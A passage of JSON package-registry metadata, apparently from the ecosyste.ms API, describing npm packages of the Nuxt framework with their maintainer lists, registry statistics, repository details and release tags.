.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":1324,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":364,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"DamianGlowala","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"pi0","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Mini-ghost","count":91,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"manniL","count":76,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"BobbieGoede","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"antfu","count":63,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"cernymatej","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"TheAlexLichter","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"wattanx","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"Atinux","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"atinux","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"dargmuesli","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"Hebilicious","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"warflash","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"lihbr","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"madebyfabian","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"posva","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"farnabaz","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"arashsheyda","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"kazupon","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kazupon"},{"login":"msmakouz","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/msmakouz"}],"active_maintainers":[{"login":"danielroe","count":321,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"Mini-ghost","count":66,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mini-ghost"},{"login":"OrbisK","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/OrbisK"},{"login":"BobbieGoede","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"cernymatej","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cernymatej"},{"login":"DamianGlowala","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"TheAlexLichter","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheAlexLichter"},{"login":"atinux","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"wattanx","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"userquin","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"KazariEX","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/KazariEX"},{"login":"HugoRCD","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/HugoRCD"},{"login":"productdevbook","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"romhml","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/romhml"},{"login":"dargmuesli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"kikudesuyo","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kikudesuyo"},{"login":"ineshbose","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"Hebilicious","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt-start-edge/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt-start-edge/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt-start-edge/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt-start-edge/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt-start-edge/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/nuxt-start-edge/codemeta","maintainers":[{"uuid":"nuxt.bot","login":"nuxt.bot","name":null,"email":"pyapar+nuxtbot@gmail.com","url":null,"packages_count":22,"html_url":"https://www.npmjs.com/~nuxt.bot","role":null,"created_at":"2022-11-11T06:10:07.420Z","updated_at":"2022-11-11T06:10:07.420Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxt.bot/packages"},{"uuid":"pi0","login":"pi0","name":null,"email":"pyapar@gmail.com","url":null,"packages_count":689,"html_url":"https://www.npmjs.com/~pi0","role":null,"created_at":"2022-11-11T06:10:07.382Z","updated_at":"2022-11-11T06:10:07.382Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/pi0/packages"},{"uuid":"atinux","login":"atinux","name":null,"email":"atinux@gmail.com","url":null,"packages_count":378,"html_url":"https://www.npmjs.com/~atinux","role":null,"created_at":"2022-11-11T06:10:07.365Z","updated_at":"2022-11-11T06:10:07.365Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/atinux/packages"},{"uuid":"danielroe","login":"danielroe","name":null,"email":"daniel@roe.dev","url":null,"packages_count":434,"html_url":"https://www.npmjs.com/~danielroe","role":null,"created_at":"2024-06-06T19:15:20.992Z","updated_at":"2024-06-06T19:15:20.992Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/danielroe/packages"},{"uuid":"clarkdo","login":"clarkdo","name":null,"email":"clark.duxin@gmail.com","url":null,"packages_count":31,"html_url":"https://www.npmjs.com/~clarkdo","role":null,"created_at":"2022-11-11T06:10:07.404Z","updated_at":"2022-11-11T06:10:07.404Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/clarkdo/packages"},{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2024-06-08T01:48:53.210Z","updated_at":"2024-06-08T01:48:53.210Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":8418500,"name":"@nuxt/schema-nightly","ecosystem":"npm","description":"Nuxt types and default configuration","homepage":"https://nuxt.com","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":1173,"first_release_published_at":"2023-10-12T12:20:48.555Z","latest_release_published_at":"2023-10-12T12:20:48.555Z","latest_release_number":"0.0.0","last_synced_at":"2026-03-31T20:01:24.528Z","created_at":"2023-10-12T13:54:41.147Z","updated_at":"2026-03-31T20:01:24.529Z","registry_url":"https://www.npmjs.com/package/@nuxt/schema-nightly","install_command":"npm install @nuxt/schema-nightly","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"pr-22649":"3.9.0-28354214.15a5e77d","pr-24010":"3.9.0-28378645.e9794ea0","pr-24787":"3.9.0-28378659.75a82c63","pr-24922":"3.10.0-28394973.15b95165","pr-24894":"3.10.0-28404855.4f7de5af","pr-23368":"3.10.0-28412264.57594fa2","pr-25210":"3.10.0-28422040.922a0429","pr-24960":"3.9.2-28423518.40bfb173","pr-25071":"3.10.0-28425618.d0e71656","pr-25770":"3.10.2-28463758.ae976d69","pr-26085":"3.11.0-28494221.a1f9ca9e","pr-25936":"3.11.0-28508900.dcd73d30","pr-26928":"3.12.0-28567604.d4b61ffd","pr-27037":"3.12.0-28577690.5048d11c","latest":"4.0.0-28946370.cc94fd98","3x":"3.15.2-28946348.60f7d15e"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Intuitive Vue Framework.","archived":false,"fork":false,"pushed_at":"2024-10-29T20:55:49.000Z","size":114898,"stargazers_count":54703,"open_issues_count":872,"forks_count":5004,"subscribers_count":793,"default_branch":"main","last_synced_at":"2024-10-29T21:25:05.500Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":"changelog.config.json","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null},"funding":{"github":["nuxt"],"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2024-10-29T18:14:58.000Z","dependencies_parsed_at":"2023-12-19T04:00:01.692Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":5138,"total_committers":630,"mean_commits":8.155555555555555,"dds":0.6897625535227715,"last_synced_commit":"800902df129a13e0da40b04b3a09e0d1a9852820"},"previous_names":["nuxt/nuxt.js"],"tags_count":223,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":222121833,"owners_count":16934971,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":61,"last_synced_at":"2024-05-20T15:02:00.816Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":99051,"followers":3259,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2024-05-20T15:02:03.446Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_